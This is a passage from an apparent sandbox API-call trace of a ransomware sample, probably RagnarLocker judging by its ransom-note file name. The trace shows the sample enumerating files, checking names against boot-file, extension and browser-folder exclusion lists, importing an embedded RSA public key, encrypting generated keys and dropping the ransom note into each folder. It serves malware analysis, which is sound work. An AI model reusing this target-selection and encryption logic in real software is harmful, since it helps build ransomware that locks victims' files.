(lpString1="eula.rtf", lpString2="ntuser.ini") returned -1 [0171.257] lstrcmpiW (lpString1="eula.rtf", lpString2="thumbs.db") returned -1 [0171.257] lstrcmpiW (lpString1=".rtf", lpString2=".db") returned 1 [0171.257] lstrcmpiW (lpString1=".rtf", lpString2=".sys") returned -1 [0171.257] lstrcmpiW (lpString1=".rtf", lpString2=".dll") returned 1 [0171.257] lstrcmpiW (lpString1=".rtf", lpString2=".lnk") returned 1 [0171.257] lstrcmpiW (lpString1=".rtf", lpString2=".msi") returned 1 [0171.257] lstrcmpiW (lpString1=".rtf", lpString2=".drv") returned 1 [0171.257] lstrcmpiW (lpString1=".rtf", lpString2=".exe") returned 1 [0171.257] GetProcessHeap () returned 0x3520000 [0171.257] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xd16c) returned 0x3606430 [0171.258] lstrcpyW (in: lpString1=0x3606830, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1031\\eula.rtf" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1031\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1031\\eula.rtf" [0171.258] FindNextFileW (in: hFindFile=0x3548180, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x141aa, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="")) returned 1 [0171.258] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1031\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1031\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0171.258] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="LocalizedData.xml" | out: lpString1="LocalizedData.xml") returned="LocalizedData.xml" [0171.258] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1031\\LocalizedData.xml") returned=".xml" [0171.259] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 1 [0171.259] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="autorun.inf") returned 1 [0171.259] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="boot.ini") returned 1 [0171.259] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootfont.bin") returned 1 [0171.259] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootsect.bak") returned 1 [0171.259] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootmgr") returned 1 [0171.259] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootmgr.efi") returned 1 [0171.259] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootmgfw.efi") returned 1 [0171.260] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="desktop.ini") returned 1 [0171.260] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="iconcache.db") returned 1 [0171.260] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntldr") returned -1 [0171.260] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntuser.dat") returned -1 [0171.260] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntuser.dat.log") returned -1 [0171.260] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntuser.ini") returned -1 [0171.260] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="thumbs.db") returned -1 [0171.260] lstrcmpiW (lpString1=".xml", lpString2=".db") returned 1 [0171.260] lstrcmpiW (lpString1=".xml", lpString2=".sys") returned 1 [0171.260] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0171.260] lstrcmpiW (lpString1=".xml", lpString2=".lnk") returned 1 [0171.260] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0171.260] lstrcmpiW (lpString1=".xml", lpString2=".drv") returned 1 [0171.260] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0171.260] GetProcessHeap () returned 0x3520000 [0171.260] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xd16c) returned 0x5d10050 [0171.262] lstrcpyW (in: lpString1=0x5d10450, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1031\\LocalizedData.xml" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1031\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1031\\LocalizedData.xml" [0171.262] FindNextFileW (in: hFindFile=0x3548180, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 1 [0171.262] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1031\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1031\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0171.262] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="SetupResources.dll" | out: lpString1="SetupResources.dll") returned="SetupResources.dll" [0171.262] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1031\\SetupResources.dll") returned=".dll" [0171.262] lstrcmpiW (lpString1="SetupResources.dll", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 1 [0171.262] lstrcmpiW (lpString1="SetupResources.dll", lpString2="autorun.inf") returned 1 [0171.262] lstrcmpiW (lpString1="SetupResources.dll", lpString2="boot.ini") returned 1 [0171.262] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootfont.bin") returned 1 [0171.262] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootsect.bak") returned 1 [0171.262] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootmgr") returned 1 [0171.262] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootmgr.efi") returned 1 [0171.262] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootmgfw.efi") returned 1 [0171.262] lstrcmpiW (lpString1="SetupResources.dll", lpString2="desktop.ini") returned 1 [0171.262] lstrcmpiW (lpString1="SetupResources.dll", lpString2="iconcache.db") returned 1 [0171.262] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntldr") returned 1 [0171.262] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntuser.dat") returned 1 [0171.262] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntuser.dat.log") returned 1 [0171.262] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntuser.ini") returned 1 [0171.262] lstrcmpiW (lpString1="SetupResources.dll", lpString2="thumbs.db") returned -1 [0171.262] lstrcmpiW (lpString1=".dll", lpString2=".db") returned 1 [0171.262] lstrcmpiW (lpString1=".dll", lpString2=".sys") returned -1 [0171.262] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0171.263] FindNextFileW (in: hFindFile=0x3548180, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 0 [0171.263] GetProcessHeap () returned 0x3520000 [0171.263] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0x8) returned 0x35868e0 [0171.263] CryptAcquireContextW (in: phProv=0x35868e0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x35868e0*=0x3556ee0) returned 1 [0171.264] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xecd090, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 452 [0171.264] GetProcessHeap () returned 0x3520000 [0171.264] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0x388) returned 0x35cd1b0 [0171.264] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xecd090, cbMultiByte=-1, lpWideCharStr=0x35cd1b0, cchWideChar=452 | out: lpWideCharStr="-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAw005kESVyxNWg2h19zL/\ne59YzmvuEZ6uVlvgGRNetNnJR7SKiNBsesbAq3hh+S4EnSxHg+qJPuCPR/Rw6jdM\ncFBkDF+mJN7/xktTy8QVnxDiz8hhhQl/0GJYVhvIGmM5cB8ta+RovnL0EArXAtfi\nWQItYorHGse44WAGWP5EpcjLXj5CBgSvk0gfpqYq5BUfbhbYCmXJJwrdph4z6y3J\n3RgkadGCA5w5bw96snaCQH+nGyhx1V9rEwH5g7Kgcay3vMT5R2SXCbPaI54xB+jn\n4pw6AuVm0I4CAKA+aTz4lU7U9ntP/on4oRLu7mzUbZ8jr+F/TFmuKUc9DmNHeVFb\nCwIDAQAB\n-----END PUBLIC KEY-----\n") returned 452 [0171.264] CryptStringToBinaryW (in: pszString="-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAw005kESVyxNWg2h19zL/\ne59YzmvuEZ6uVlvgGRNetNnJR7SKiNBsesbAq3hh+S4EnSxHg+qJPuCPR/Rw6jdM\ncFBkDF+mJN7/xktTy8QVnxDiz8hhhQl/0GJYVhvIGmM5cB8ta+RovnL0EArXAtfi\nWQItYorHGse44WAGWP5EpcjLXj5CBgSvk0gfpqYq5BUfbhbYCmXJJwrdph4z6y3J\n3RgkadGCA5w5bw96snaCQH+nGyhx1V9rEwH5g7Kgcay3vMT5R2SXCbPaI54xB+jn\n4pw6AuVm0I4CAKA+aTz4lU7U9ntP/on4oRLu7mzUbZ8jr+F/TFmuKUc9DmNHeVFb\nCwIDAQAB\n-----END PUBLIC KEY-----\n", cchString=0x0, dwFlags=0x0, pbBinary=0x0, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0171.264] GetProcessHeap () returned 0x3520000 [0171.264] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0x126) returned 0x35948f0 [0171.264] CryptStringToBinaryW (in: pszString="-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAw005kESVyxNWg2h19zL/\ne59YzmvuEZ6uVlvgGRNetNnJR7SKiNBsesbAq3hh+S4EnSxHg+qJPuCPR/Rw6jdM\ncFBkDF+mJN7/xktTy8QVnxDiz8hhhQl/0GJYVhvIGmM5cB8ta+RovnL0EArXAtfi\nWQItYorHGse44WAGWP5EpcjLXj5CBgSvk0gfpqYq5BUfbhbYCmXJJwrdph4z6y3J\n3RgkadGCA5w5bw96snaCQH+nGyhx1V9rEwH5g7Kgcay3vMT5R2SXCbPaI54xB+jn\n4pw6AuVm0I4CAKA+aTz4lU7U9ntP/on4oRLu7mzUbZ8jr+F/TFmuKUc9DmNHeVFb\nCwIDAQAB\n-----END PUBLIC KEY-----\n", cchString=0x0, dwFlags=0x0, pbBinary=0x35948f0, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x35948f0, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0171.264] GetProcessHeap () returned 0x3520000 [0171.264] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x35cd1b0 | out: hHeap=0x3520000) returned 1 [0171.264] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x35948f0, cbEncoded=0x126, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x5cfd63c, pcbStructInfo=0x5cfd634 | out: pvStructInfo=0x5cfd63c, pcbStructInfo=0x5cfd634) returned 1 [0171.264] CryptImportPublicKeyInfo (in: hCryptProv=0x3556ee0, dwCertEncodingType=0x1, pInfo=0x357fc90*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x357fcc0*, PublicKey.cbData=0x10e, PublicKey.pbData=0x357fcc8*, PublicKey.cUnusedBits=0x0), phKey=0x35868e4 | out: phKey=0x35868e4*=0x3547dc0) returned 1 [0171.265] GetProcessHeap () returned 0x3520000 [0171.265] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x35948f0 | out: hHeap=0x3520000) returned 1 [0171.265] LocalFree (hMem=0x357fc90) returned 0x0 [0171.265] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd63c*=0x3556990) returned 1 [0171.265] CryptGenRandom (in: hProv=0x3556990, dwLen=0x28, pbBuffer=0x3613354 | out: pbBuffer=0x3613354) returned 1 [0171.265] CryptReleaseContext (hProv=0x3556990, dwFlags=0x0) returned 1 [0171.265] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd63c*=0x0) returned 0 [0171.293] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd638*=0x35565d8) returned 1 [0171.294] CryptGenRandom (in: hProv=0x35565d8, dwLen=0x40, pbBuffer=0x5cfd5f8 | out: pbBuffer=0x5cfd5f8) returned 1 [0171.294] CryptReleaseContext (hProv=0x35565d8, dwFlags=0x0) returned 1 [0171.294] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd638*=0x0) returned 0 [0171.319] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd634*=0x3557188) returned 1 [0171.319] CryptGenRandom (in: hProv=0x3557188, dwLen=0x20, pbBuffer=0x361337c | out: pbBuffer=0x361337c) returned 1 [0171.320] CryptReleaseContext (hProv=0x3557188, dwFlags=0x0) returned 1 [0171.320] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd634*=0x0) returned 0 [0171.323] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd630*=0x3556330) returned 1 [0171.324] CryptGenRandom (in: hProv=0x3556330, dwLen=0x40, pbBuffer=0x5cfd5f0 | out: pbBuffer=0x5cfd5f0) returned 1 [0171.324] CryptReleaseContext (hProv=0x3556330, dwFlags=0x0) returned 1 [0171.324] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd630*=0x0) returned 0 [0171.329] CryptEncrypt (in: hKey=0x3547dc0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x361339c*, pdwDataLen=0x5cfe340*=0x28, dwBufLen=0x190 | out: pbData=0x361339c*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0171.330] GetLastError () returned 0x80090016 [0171.331] CryptEncrypt (in: hKey=0x3547dc0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x361349c*, pdwDataLen=0x5cfe340*=0x20, dwBufLen=0x140 | out: pbData=0x361349c*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0171.336] GetLastError () returned 0x80090016 [0171.336] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xec1af0, lpParameter=0x3606430, dwCreationFlags=0x0, lpThreadId=0x5cfdd80 | out: lpThreadId=0x5cfdd80*=0xed4) returned 0x3f0 [0171.337] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd63c*=0x3557188) returned 1 [0171.338] CryptGenRandom (in: hProv=0x3557188, dwLen=0x28, pbBuffer=0x5d1cf74 | out: pbBuffer=0x5d1cf74) returned 1 [0171.338] CryptReleaseContext (hProv=0x3557188, dwFlags=0x0) returned 1 [0171.338] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd63c*=0x0) returned 0 [0171.341] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd638*=0x3557188) returned 1 [0171.342] CryptGenRandom (in: hProv=0x3557188, dwLen=0x40, pbBuffer=0x5cfd5f8 | out: pbBuffer=0x5cfd5f8) returned 1 [0171.342] CryptReleaseContext (hProv=0x3557188, dwFlags=0x0) returned 1 [0171.342] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd638*=0x0) returned 0 [0171.345] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd634*=0x35567f8) returned 1 [0171.346] CryptGenRandom (in: hProv=0x35567f8, dwLen=0x20, pbBuffer=0x5d1cf9c | out: pbBuffer=0x5d1cf9c) returned 1 [0171.346] CryptReleaseContext (hProv=0x35567f8, dwFlags=0x0) returned 1 [0171.346] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd634*=0x0) returned 0 [0171.350] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd630*=0x35564c8) returned 1 [0171.351] CryptGenRandom (in: hProv=0x35564c8, dwLen=0x40, pbBuffer=0x5cfd5f0 | out: pbBuffer=0x5cfd5f0) returned 1 [0171.351] CryptReleaseContext (hProv=0x35564c8, dwFlags=0x0) returned 1 [0171.351] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd630*=0x0) returned 0 [0171.355] CryptEncrypt (in: hKey=0x3547dc0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d1cfbc*, pdwDataLen=0x5cfe340*=0x28, dwBufLen=0x190 | out: pbData=0x5d1cfbc*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0171.356] GetLastError () returned 0x80090016 [0171.356] CryptEncrypt (in: hKey=0x3547dc0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d1d0bc*, pdwDataLen=0x5cfe340*=0x20, dwBufLen=0x140 | out: pbData=0x5d1d0bc*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0171.356] GetLastError () returned 0x80090016 [0171.357] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xec1af0, lpParameter=0x5d10050, dwCreationFlags=0x0, lpThreadId=0x5cfdd84 | out: lpThreadId=0x5cfdd84*=0xf1c) returned 0x3b4 [0171.357] WaitForMultipleObjects (nCount=0x2, lpHandles=0x5cfe0d0*=0x3f0, bWaitAll=1, dwMilliseconds=0xffffffff) returned 0x0 [0171.515] GetProcessHeap () returned 0x3520000 [0171.515] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x35868e0 | out: hHeap=0x3520000) returned 1 [0171.515] CloseHandle (hObject=0x3f0) returned 1 [0171.515] GetProcessHeap () returned 0x3520000 [0171.515] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x3606430 | out: hHeap=0x3520000) returned 1 [0171.518] CloseHandle (hObject=0x3b4) returned 1 [0171.518] GetProcessHeap () returned 0x3520000 [0171.518] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x5d10050 | out: hHeap=0x3520000) returned 1 [0171.519] FindClose (in: hFindFile=0x3548180 | out: hFindFile=0x3548180) returned 1 [0171.520] FindNextFileW (in: hFindFile=0x3547bc0, lpFindFileData=0x5cfeb8c | out: lpFindFileData=0x5cfeb8c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37db23a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1032", cAlternateFileName="")) returned 1 [0171.520] lstrcmpiW (lpString1="1032", lpString2=".") returned 1 [0171.520] lstrcmpiW (lpString1="1032", lpString2="..") returned 1 [0171.520] lstrcmpiW (lpString1="1032", lpString2="Windows") returned -1 [0171.520] lstrcmpiW (lpString1="1032", lpString2="Windows.old") returned -1 [0171.520] lstrcmpiW (lpString1="1032", lpString2="Tor browser") returned -1 [0171.520] lstrcmpiW (lpString1="1032", lpString2="Internet Explorer") returned -1 [0171.521] lstrcmpiW (lpString1="1032", lpString2="Google") returned -1 [0171.521] lstrcmpiW (lpString1="1032", lpString2="Opera") returned -1 [0171.521] lstrcmpiW (lpString1="1032", lpString2="Opera Software") returned -1 [0171.521] lstrcmpiW (lpString1="1032", lpString2="Mozilla") returned -1 [0171.521] lstrcmpiW (lpString1="1032", lpString2="Mozilla Firefox") returned -1 [0171.521] lstrcmpiW (lpString1="1032", lpString2="$Recycle.Bin") returned 1 [0171.521] lstrcmpiW (lpString1="1032", lpString2="ProgramData") returned -1 [0171.521] lstrcmpiW (lpString1="1032", lpString2="All Users") returned -1 [0171.521] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\*.*", nBufferLength=0x104, lpBuffer=0x5cfe984, lpFilePart=0x5cff044 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\*.*", lpFilePart=0x5cff044*="*.*") returned 0x1d [0171.521] lstrcpyW (in: lpString1=0x5cfe9b8, lpString2="1032" | out: lpString1="1032") returned="1032" [0171.521] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1032", lpString2="\\" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1032\\") returned="\\\\?\\C:\\588bce7c90097ed212\\1032\\" [0171.521] lstrcpyW (in: lpString1=0x5cfe778, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1032\\" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1032\\") returned="\\\\?\\C:\\588bce7c90097ed212\\1032\\" [0171.521] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1032\\", lpString2="!$R4GN4R_B8CF767A$!.txt" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1032\\!$R4GN4R_B8CF767A$!.txt") returned="\\\\?\\C:\\588bce7c90097ed212\\1032\\!$R4GN4R_B8CF767A$!.txt" [0171.521] CopyFileW (lpExistingFileName="C:\\Users\\Public\\Documents\\!$R4GN4R_B8CF767A$!.txt" (normalized: "c:\\users\\public\\documents\\!$r4gn4r_b8cf767a$!.txt"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1032\\!$R4GN4R_B8CF767A$!.txt" (normalized: "c:\\588bce7c90097ed212\\1032\\!$r4gn4r_b8cf767a$!.txt"), bFailIfExists=1) returned 1 [0171.528] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1032\\", lpString2="*.*" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1032\\*.*") returned="\\\\?\\C:\\588bce7c90097ed212\\1032\\*.*" [0171.528] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1032\\*.*", nBufferLength=0x104, lpBuffer=0x5cfd864, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1032\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0171.528] lstrcpyW (in: lpString1=0x5cfd65c, lpString2="*.*" | out: lpString1="*.*") returned="*.*" [0171.528] lstrcpyW (in: lpString1=0x5cfd8a2, lpString2="*.*" | out: lpString1="*.*") returned="*.*" [0171.528] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1032\\*.*", fInfoLevelId=0x1, lpFindFileData=0x5cfde80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5cfde80) returned 0x3547b00 [0171.528] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0171.528] FindNextFileW (in: hFindFile=0x3547b00, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37db23a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf3946b61, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0171.530] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0171.530] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0171.530] FindNextFileW (in: hFindFile=0x3547b00, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf3943112, ftCreationTime.dwHighDateTime=0x1d66669, ftLastAccessTime.dwLowDateTime=0xf3943112, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xed67b2c2, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x10fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="!$R4GN4R_B8CF767A$!.txt", cAlternateFileName="")) returned 1 [0171.530] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2=".") returned -1 [0171.530] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2="..") returned -1 [0171.530] FindNextFileW (in: hFindFile=0x3547b00, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x22ac, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0171.530] lstrcmpiW (lpString1="eula.rtf", lpString2=".") returned 1 [0171.530] lstrcmpiW (lpString1="eula.rtf", lpString2="..") returned 1 [0171.530] FindNextFileW (in: hFindFile=0x3547b00, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x1510c, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="")) returned 1 [0171.530] lstrcmpiW (lpString1="LocalizedData.xml", lpString2=".") returned 1 [0171.530] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="..") returned 1 [0171.530] FindNextFileW (in: hFindFile=0x3547b00, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4b58, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", 